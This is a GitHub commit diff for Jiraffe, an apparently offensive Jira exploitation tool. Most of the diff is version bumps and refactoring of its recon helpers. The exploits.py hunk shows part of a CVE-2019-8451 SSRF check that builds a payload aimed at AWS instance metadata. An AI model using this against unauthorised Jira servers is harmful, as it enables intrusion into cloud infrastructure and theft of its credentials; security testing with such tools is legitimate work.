Skip to content

Commit

Permalink
patch+bump: refactored exploits, recon-utils; generated code-coverage…
Browse files Browse the repository at this point in the history
… metrics
  • Loading branch information
0x48piraj committed May 8, 2021
1 parent 8180bec commit 4d76345
Show file tree
Hide file tree
Showing 7 changed files with 43 additions and 14 deletions.
3 changes: 2 additions & 1 deletion .gitignore
Original file line number Diff line number Diff line change
Expand Up @@ -47,4 +47,5 @@ Session.vim
.netrwhist
*~

/Jiraffe/*.bak
/jiraffe/*.bak
build-scripts
6 changes: 2 additions & 4 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -12,11 +12,9 @@
<a href="https://github.com/0x48piraj/Jiraffe/issues?q=is%3Aissue+is%3Aclosed">
<img src="https://img.shields.io/github/issues-closed-raw/0x48piraj/Jiraffe?color=dark-green&label=issues%20fixed">
</a>
<!--
<a href="https://travis-ci.com/0x48piraj/Jiraffe">
<img src="https://img.shields.io/travis/com/0x48piraj/Jiraffe.svg?color=dark-green&label=tests">
<a href="https://github.com/0x48piraj/Jiraffe/tree/master/tests">
<img src="https://raw.githubusercontent.com/0x48piraj/Jiraffe/master/assets/cov.svg">
</a>
-->

<p align="center">
<img alt="Jiraffe" src="https://raw.githubusercontent.com/0x48piraj/Jiraffe/master/assets/jiraffe-cover.png"><br>
Expand Down
21 changes: 21 additions & 0 deletions assets/cov.svg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
2 changes: 1 addition & 1 deletion jiraffe/__init__.py
Original file line number Diff line number Diff line change
Expand Up @@ -2,4 +2,4 @@
# -*- coding: utf-8 -*-

name = "jiraffe"
__version__ = "2.0.5"
__version__ = "2.0.6"
2 changes: 1 addition & 1 deletion jiraffe/exploits.py
Original file line number Diff line number Diff line change
Expand Up @@ -49,7 +49,7 @@ def cve2019_8451(target, ssrf='https://google.com'):
if '"rc":200' in response and res.status_code == 200 and 'set-cookie' in response:
print(style.GREEN("[+] Target found vulnerable to CVE-2019-8451") + style.RESET(''))
print(style.YELLOW("[*] Detecting target's hosting service ...") + style.RESET(''))
if isaws(target.split('://')[1]): # dirty but works reliably
if isaws(target):
print(style.GREEN("[+] Target is hosted on Amazon AWS") + style.RESET(''))
print(style.YELLOW("[*] Testing AWS SSRF payloads ...") + style.RESET(''))
payload = target + "/plugins/servlet/oauth/users/icon-uri?consumerUri=" + AWS_INSTANCE
Expand Down
21 changes: 15 additions & 6 deletions jiraffe/recon.py
Original file line number Diff line number Diff line change
Expand Up @@ -10,19 +10,28 @@

def uparse(target):
url = urlparse(target)
return url.scheme + "://" + url.netloc + url.path if url.path else "" # BASE URL
if url.path:
if url.path == "/":
print("[-] Target URL doesn't seems to be correct.\n\t\tValid Target URL Paths: http(s)://target.com/.../(login.action;/view.action;/viewpage.action;/releaseview.action;/aboutconfluencepage.action;/secure/Dashboard.jspa)")
return url.scheme + "://" + url.netloc + url.path
else:
return url.scheme + "://" + url.netloc + url.path
return
else:
print("[-] Target URL doesn't seems to be correct.\n\t\tValid Target URL Paths: http(s)://target.com/.../(login.action;/view.action;/viewpage.action;/releaseview.action;/aboutconfluencepage.action;/secure/Dashboard.jspa)")
return url.scheme + "://" + url.netloc

def request(target):
UA = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1"
headers = {'X-Atlassian-Token':'no-check', 'User-Agent':UA}
try:
r = requests.get(target, headers=headers)
except Exception as e:
print("Problem with the HTTP request.", e, sep="\n")
print("[-] Problem with the HTTP request.", e, sep="\n")
if r.status_code != 200:
print("Something went wrong! (STATUS {})".format(r.status_code))
print("[-] Something went wrong! (STATUS {})".format(r.status_code))
if r.status_code == 302:
print("HTTP request got redirected. Set this instead: " + r.headers['Location'])
print("[*] HTTP request got redirected. Set this instead: " + r.headers['Location'])
exit(1) # https://stackoverflow.com/a/2434619

return r, r.text
Expand All @@ -37,7 +46,8 @@ def isjira(target):
return False

def isaws(target):
data = socket.gethostbyaddr(target)
target = urlparse(target)
data = socket.gethostbyaddr(target.netloc)
if "amazonaws" in str(data):
return True
else:
Expand All @@ -48,7 +58,6 @@ def getversion(target): # ENUM #1: Jira version appears to be ____
f_build = '0.0.0' # default
vers = []
final_version = ""
target = target + urlparse(target).path if "/login.jsp" in urlparse(target).path else target + '/login.jsp'
res, response = request(target)
soup = bs4.BeautifulSoup(response, "html.parser")
try:
Expand Down
2 changes: 1 addition & 1 deletion setup.py
Original file line number Diff line number Diff line change
Expand Up @@ -15,7 +15,7 @@
# call to setup()
setup(
name="jiraffe",
version="2.0.5",
version="2.0.6",
description="One stop place for exploiting all Jira instances in your proximity.",
long_description=README,
long_description_content_type="text/markdown",
Expand Down

0 comments on commit 4d76345

Please sign in to comment.